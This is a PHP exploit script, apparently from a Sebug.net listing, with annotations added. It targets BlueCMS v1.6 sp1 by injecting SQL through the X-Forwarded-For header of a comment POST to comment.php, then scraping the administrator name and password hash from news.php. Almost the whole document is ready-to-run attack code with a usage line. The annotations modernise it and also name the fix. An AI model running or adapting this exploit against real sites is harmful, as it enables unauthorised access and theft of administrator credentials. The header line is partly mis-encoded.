BlueCMS v1.6 sp1 $_SERVER injection vulnerability (getip() trusts X-Forwarded-For, leading to SQL injection in comment.php)

Է:

@Sebug.net   dis
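<?php
/*
 * BlueCMS v1.6 sp1 getip() remote SQL injection exploit (original author: cnryan).
 *
 * The Sebug.net disclaimer that preceded this listing was mis-encoded; it is the site's
 * standard "provided for security research and teaching only, use at your own risk" notice.
 *
 * How it works, as far as the payload below shows (the BlueCMS source is not on this page):
 *   1. send()  POSTs a comment to comment.php?act=send. The application records the poster's
 *      IP, and getip() takes that IP from the X-Forwarded-For header without validation or
 *      escaping, so the header value is spliced into the INSERT statement verbatim.
 *   2. The header payload closes the application's own VALUES tuple and appends a second row
 *      whose comment text is a subquery over blue_admin (admin_name and pwd).
 *   3. send2() fetches news.php?id=1, where the planted comment is rendered, and scrapes the
 *      <u-...-u><p-...-p> markers out of the HTML.
 * The recovered pwd is whatever the table stores -- presumably a hash; the exploit does not
 * decode it.
 *
 * Application-side fix: never feed X-Forwarded-For (or any $_SERVER value the client controls)
 * into SQL or trust it as the client address; escape/parameterise the IP before the INSERT.
 *
 * Usage: php <this file> <host> </path/to/bluecms/>
 */
print_r('
+---------------------------------------------------------------------------+
BlueCMS v1.6 sp1 Getip() Remote SQL Injection Exploit
by cnryan
Mail: cnryan2008[at]gmail[dot]com
Blog: http://hi.baidu.com/cnryan    
+---------------------------------------------------------------------------+
');

if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Example:
php '.$argv[0].' localhost /bluecms/
+---------------------------------------------------------------------------+
');
    exit;
}

// 7 == E_ERROR | E_WARNING | E_PARSE: notices from missing regex groups etc. stay silent.
error_reporting(E_ERROR | E_WARNING | E_PARSE);
ini_set('max_execution_time', 0);

$host = $argv[1];
// Normalise to exactly one trailing slash so "/bluecms" and "/bluecms/" both build
// "/bluecms/comment.php"; the original concatenated the path verbatim.
$path = rtrim($argv[2], '/').'/';

send();
send2();

/**
 * Stage 1: plant the SQL payload through the X-Forwarded-For header of a comment POST.
 *
 * Reads $host and $path from the globals set above. Returns the raw HTTP response; the
 * caller ignores it, because the planted row is read back by send2().
 * Dies with a message if the TCP connect fails -- the original wrote to the boolean
 * returned by a failed fsockopen(), which is a TypeError on PHP 8 -- and closes the socket.
 */
function send()
{
    global $host, $path;

    // Ordinary comment-form fields; "submit" is the URL-encoded GB2312 button label.
    $cmd = "mood=6&comment=test&id=1&type=1&submit=%CC%E1%BD%BB%C6%C0%C2%DB";

    // SQL payload. " 00','1')" completes the application's own tuple, ",(...)" appends a
    // second row whose comment column is the blue_admin subquery, and the trailing "'99"
    // opens a string that the application's own closing quote terminates. The column
    // layout is inferred from this payload, not from comment.php -- keep it unchanged.
    $getinj = " 00','1'),('','1','0','1','6',(select concat('<u-',admin_name,'-u><p-',pwd,'-p>') from blue_admin),'1281181973','99";

    $data  = "POST ".$path."comment.php?act=send HTTP/1.1\r\n";
    $data .= "Accept: */*\r\n";
    $data .= "Accept-Language: zh-cn\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $data .= "Host: $host\r\n";
    $data .= "Content-Length: ".strlen($cmd)."\r\n";
    // Close lets the feof() loop below terminate when the server finishes the response.
    $data .= "Connection: Close\r\n";
    $data .= "X-Forwarded-For: $getinj\r\n\r\n";
    $data .= $cmd;

    $fp = fsockopen($host, 80);
    if (!$fp) {
        die('[-]No response from '.$host);
    }
    fputs($fp, $data);

    $resp = '';
    while (!feof($fp)) {
        $resp .= fread($fp, 1024);
    }
    fclose($fp);

    return $resp;
}
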
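/**
 * Stage 2: fetch news.php?id=1 and scrape the admin name / pwd planted by send().
 *
 * Reads $host and $path from the globals set at the top of the file. Prints the two values
 * on success, otherwise dies with a failure message. Returns nothing.
 *
 * Changes from the original: the request sends "Connection: Close" instead of Keep-Alive,
 * because the feof() loop only ends when the server closes the socket (with Keep-Alive it
 * blocked until the server's idle timeout); the Accept-Encoding header is dropped, because a
 * gzip/deflate body would be matched against the regex without ever being decompressed; and
 * the match check uses a logical && instead of the bitwise string & of the original.
 */
function send2()
{
    global $host, $path;

    $message  = "GET ".$path."news.php?id=1 HTTP/1.1\r\n";
    $message .= "Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */*\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; GreenBrowser)\r\n";
    $message .= "Host: $host\r\n";
    $message .= "Connection: Close\r\n\r\n";

    $fd = fsockopen($host, 80);
    if (!$fd) {
        die('[-]No response from '.$host);
    }
    fputs($fd, $message);

    $resp = '';
    while (!feof($fd)) {
        $resp .= fgets($fd);
    }
    fclose($fd);

    // The response is matched raw, headers and all. NOTE(review): an HTTP/1.1 server may use
    // chunked transfer encoding; a chunk boundary falling inside the markers would break the
    // match -- not handled here, as in the original.
    preg_match_all("/<u-([^<]*)-u><p-([^<]*)-p>/", $resp, $found);

    if (!empty($found[1][0]) && !empty($found[2][0])) {
        echo "username->".$found[1][0]."\r\n";
        // Whatever blue_admin.pwd holds -- presumably a hash, not cleartext.
        echo "password->".$found[2][0]."\r\n";
        echo "[+]congratulation ^ ^";
    } else {
        die('[-]exploited fail >"<');
    }
}
?>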